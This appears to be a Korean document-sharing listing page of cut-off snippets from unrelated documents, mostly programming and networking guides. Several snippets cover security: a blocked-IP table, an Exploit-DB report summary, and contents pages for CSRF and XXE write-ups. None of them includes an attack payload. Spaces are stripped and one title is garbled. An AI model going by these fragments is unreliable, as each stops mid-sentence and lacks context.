(https://www.kisarbl.or.kr) < 목차 > Ⅰ. 개요 3 Ⅱ. 실시간스팸차단리스트 (RBL) ( 간편설정 ) 4 1. 메일서버 (Exchange Server 2007) 설정변경 4 2. 스팸차단테스트 10 Ⅰ. 개요 실시간스팸차단리스트 (RBL) 는메일서버를운영하는누구나손쉽게효과적으로스팸수신을차단하는데이용할수있도록한국인터넷진흥원 (KISA)
More information학습목표 함수프로시저, 서브프로시저의의미를안다. 매개변수전달방식을학습한다. 함수를이용한프로그래밍한다. 2
학습목표 함수프로시저, 서브프로시저의의미를안다. 매개변수전달방식을학습한다. 함수를이용한프로그래밍한다. 2 6.1 함수프로시저 6.2 서브프로시저 6.3 매개변수의전달방식 6.4 함수를이용한프로그래밍 3 프로시저 (Procedure) 프로시저 (Procedure) 란무엇인가? 논리적으로묶여있는하나의처리단위 내장프로시저 이벤트프로시저, 속성프로시저, 메서드, 비주얼베이직내장함수등
More informationìœ€íŁ´IP( _0219).xlsx
차단 IP 국적 공격유형 목적지포트 IPS 룰 180.97.215.45 중국 서비스취약점공격 TCP/5555 (0001)SYN Port Scan 222.186.42.248 중국 서비스취약점공격 TCP/80 (0001)SYN Port Scan 104.236.178.166 미국 웹해킹 TCP/80 (5010)HEAD / HTTP (Http server buffer
More information쉽게 풀어쓴 C 프로그래밊
Power Java 제 27 장데이터베이스 프로그래밍 이번장에서학습할내용 자바와데이터베이스 데이터베이스의기초 SQL JDBC 를이용한프로그래밍 변경가능한결과집합 자바를통하여데이터베이스를사용하는방법을학습합니다. 자바와데이터베이스 JDBC(Java Database Connectivity) 는자바 API 의하나로서데이터베이스에연결하여서데이터베이스안의데이터에대하여검색하고데이터를변경할수있게한다.
More information아래 항목은 최신( ) 이미지를 모두 제대로 설치하였을 때를 가정한다
공유기사용환경에서 MNC-V100 환경설정하기 다음설명은 AnyGate GW-400A (Http://www.anygate.co.kr) 를사용하는네트워크환경에서 MNC-V100 을연결하여사용하는법을설명합니다. 공유기내부네트워크환경설정공유기를사용하는환경에서공유기의설정을아래그림과같이설정하시면 MNC-V100의설정을변경하지않아도모비캠과연결할수있습니다. ( 공유기의환경을변경하기어려운경우에는
More information쉽게 풀어쓴 C 프로그래밍
CHAPTER 13. HTML5 위치정보와드래그앤드롭 SVG SVG(Scalable Vector Graphics) 는 XML- 기반의벡터이미지포맷 웹에서벡터 - 기반의그래픽을정의하는데사용 1999 년부터 W3C 에의하여표준 SVG 의장점 SVG 그래픽은확대되거나크기가변경되어도품질이손상되지않는다. SVG 파일에서모든요소와속성은애니메이션이가능하다. SVG 이미지는어떤텍스트에디터로도생성하고편집할수있다.
More informationEDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj
EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은
More informationMicrosoft PowerPoint Android-SDK설치.HelloAndroid(1.0h).pptx
To be an Android Expert 문양세강원대학교 IT 대학컴퓨터학부 Eclipse (IDE) JDK Android SDK with ADT IDE: Integrated Development Environment JDK: Java Development Kit (Java SDK) ADT: Android Development Tools 2 JDK 설치 Eclipse
More information작성자 : 기술지원부 김 삼 수
작성자 : 기술지원부김삼수 qpopper 설치 qpopper란무엇인가? 메일수신을하기위해필요한프로그램으로 qpopper는가장인기있는 email 클라이언트에의해사용되는인터넷 email 다운로딩을위한 POP3프로토콜을사용합니다. 그러나 qpopper는 sendmail이나 smail과같이 SMTP프로토콜은포함하고있지않습니다. (
More information0. 들어가기 전
컴퓨터네트워크 14 장. 웹 (WWW) (3) - HTTP 1 이번시간의학습목표 HTTP 의요청 / 응답메시지의구조와동작원리이해 2 요청과응답 (1) HTTP (HyperText Transfer Protocol) 웹브라우저는 URL 을이용원하는자원표현 HTTP 메소드 (method) 를이용하여데이터를요청 (GET) 하거나, 회신 (POST) 요청과응답 요청
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More information2009년 상반기 사업계획
소켓프로그래밍활용 IT CookBook, 유닉스시스템프로그래밍 학습목표 소켓인터페이스를활용한다양한프로그램을작성할수있다. 2/23 목차 TCP 기반프로그래밍 반복서버 동시동작서버 동시동작서버-exec함수사용하기 동시동작서버-명령행인자로소켓기술자전달하기 UDP 프로그래밍 3/23 TCP 기반프로그래밍 반복서버 데몬프로세스가직접모든클라이언트의요청을차례로처리 동시동작서버
More informationStuduino소프트웨어 설치
Studuino 프로그래밍환경 Studuino 소프트웨어설치 본자료는 Studuino 프로그래밍환경설치안내서입니다. Studuino 프로그래밍 환경의갱신에따라추가 / 수정될수있습니다. 목차 1. 소개... 1 2. Windows... 2 2.1. 프로그래밍환경설치... 2 2.1.1. 웹설치버전설치방법... 2 2.2. Studuino 프로그래밍환경실행...
More informationISP and CodeVisionAVR C Compiler.hwp
USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler http://www.avrmall.com/ November 12, 2007 Copyright (c) 2003-2008 All Rights Reserved. USBISP V3.0 & P-AVRISP V1.0 with CodeVisionAVR C Compiler
More information<32355FC8A8C6E4C0CCC1F620B1B8C3E020BAB8BEC820B0A1C0CCB5E52E687770>
안전한홈페이지운영을위한 웹서버설정및개발보안가이드 (Ver. 1.0) 2007. 10 출처 : CrossWeave 홈페이지개발보안정책가이드 (Ver. 1.3) Pusan National University Information Technology Center 1 / 13 목 차 Ⅰ. 개요 3 Ⅱ. 정보보호를고려한홈페이지구축의필요성 4 Ⅲ. 홈페이지구축및운영기본가이드
More informationCloud Friendly System Architecture
-Service Clients Administrator 1. -Service 구성도 : ( 좌측참고 ) LB(LoadBlancer) 2. -Service 개요 ucloud Virtual Router F/W Monitoring 개념 특징 적용가능분야 Server, WAS, DB 로구성되어 web service 를클라우드환경에서제공하기위한 service architecture
More information혼자서일을다하는 JSP. 이젠일을 Servlet 과나눠서한다. JSP와서블릿의표현적인차이 - JSP는 <html> 내에서자바를사용할수있는수단을제공한다. - 서블릿은자바내에서 <html> 을작성할수있는수단을제공한다. - JSP나서블릿으로만웹페이지를작성하면자바와다양한코드가
혼자서일을다하는 JSP. 이젠일을 Servlet 과나눠서한다. JSP와서블릿의표현적인차이 - JSP는 내에서자바를사용할수있는수단을제공한다. - 서블릿은자바내에서 을작성할수있는수단을제공한다. - JSP나서블릿으로만웹페이지를작성하면자바와다양한코드가웹페이지내에뒤섞여있어서웹페이지의화면설계가점점어려워진다. - 서블릿이먼저등장하였으나, 자바내에
More informationMicrosoft Word - 제로보드 XE_CSRF증명.doc
제로보드 XE - CSRF 취약점증명 작성자 : eits1st 작성날짜 : 09년 3월 16일 목 차 1. 개요 1) CSRF의정의 2) 제로보드 XE 3) CSRF 테스트환경 2. 취약점증명 1) 권한상승시웹서버로전송되는 Request( 요청 ) 구문확인및추출 2) 확인된 Request( 요청 ) 구문을 AJAX(httpxml) 코드로작성 3) AJAX(httpxml)
More informationPowerPoint 프레젠테이션
워드프레스소개및운용관리안내 1 목차 2 1. 워드프레스소개 역사 2003 년매트물렌웨그에의해탄생 ver0.7 플러그인구조, 애플리케이션프로그램밍인터페이스도입 테마구조와페이지운영이가능한 ver1.5 로테마변경및디자인에대한자유도부여 Wyswyg 방식의문서편집기도입 MU(multi-user) 개념의도입 Social 쉐어플러그인도입으로 (SNS 연계 ) 현재워드프레스
More informationHLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 :
HLS(HTTP Live Streaming) 이용가이드 1. HLS 소개 Apple iphone, ipad, ipod의운영체제인 ios에서사용하는표준 HTTP 기반스트리밍프로토콜입니다. 2. HLS 지원대상 - 디바이스 : iphone/ipad/ipod - 운영체제 : ios 3.0 이상 - 콘텐츠형식 : MP4 (H264,AAC ), MP3 * 디바이스별해상도,
More informationSpotlight on Oracle V10.x 트라이얼프로그램설치가이드 DELL SOFTWARE KOREA
Spotlight on Oracle V10.x DELL SOFTWARE KOREA 2016-11-15 Spotlight on Oracle 목차 1. 시스템요구사항... 2 1.1 지원하는데이터베이스...2 1.2 사용자설치홖경...2 2. 프로그램설치... 3 2.1 설치프로그램실행...3 2.2 라이선스사용관련내용확인및사용동의...3 2.3 프로그램설치경로지정...4
More information기술문서 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라.
기술문서 14. 11. 10. 작성 XXE Attacks 작성자 : 인천대학교 OneScore 김영성 dokymania@naver.com I. 소개 2 II. 본문 2 가. XML external entities 2 나. XXE Attack 3 다. 점검방법 3 라. Exploit 5 마. 피해 6 III. 결론 6 가. 권고사항 6 I. 소개 가. 역자 본문서는
More informationWAS 의동작과 WEB, Servlet, JSP 엑셈컨설팅본부 /APM 박종현 웹어플리케이션서버란? 웹어플리케이션서버방식은웹서버가직접어플리케이션프로그램을처리하는것이아니라웹어플리케이션서버에게처리를넘겨주고어플리케이션서버가어플리케이션프로그램을처리한다. 여러명의사용자가동일한페
WAS 의동작과 WEB, Servlet, JSP 엑셈컨설팅본부 /APM 박종현 웹어플리케이션서버란? 웹어플리케이션서버방식은웹서버가직접어플리케이션프로그램을처리하는것이아니라웹어플리케이션서버에게처리를넘겨주고어플리케이션서버가어플리케이션프로그램을처리한다. 여러명의사용자가동일한페이지를요청하여여러어플리케이션프로그램을처리할때오직한개의프로세스만을할당하고사용자의요청을 thread
More informationInside Android Applications
WEBSECURIFY WALKTHROUGH 웹 응용프로그램 침투 테스팅 도구 번역 문서 www.boanproject.com 번역 : 임효영 편집 : 조정원 해당 문서는 연구목적으로 진행된 번역 프로젝트입니다. 상업적으로 사용을 하거나, 악의적인 목적에 의한 사용을 할 시 발생하는 법적인 책임은 사용자 자신에게 있음을 경고합니다. 원본 : http://resources.infosecinstitute.com/websecurify-testing-tool/
More informationMicrosoft Word - ijungbo1_13_02
[ 인터넷정보관리사필기 ] 기출문제 (11) 1 1. 지금부터인터넷정보관리사필기기출문제 (11) 를풀어보겠습니다. 2. 홈페이지제작할때유의할점으로가장거리가먼것은무엇일까요? 3. 정답은 ( 라 ) 입니다. 홈페이지제작시유의할점으로는로딩속도를고려하며, 사용자중심의인터페이스로제작하고, 이미지의크기는적당하게조절하여야한다. [ 인터넷정보관리사필기 ] 기출문제 (11)
More informationMicrosoft PowerPoint - chap01-C언어개요.pptx
#include int main(void) { int num; printf( Please enter an integer: "); scanf("%d", &num); if ( num < 0 ) printf("is negative.\n"); printf("num = %d\n", num); return 0; } 1 학습목표 프로그래밍의 기본 개념을
More information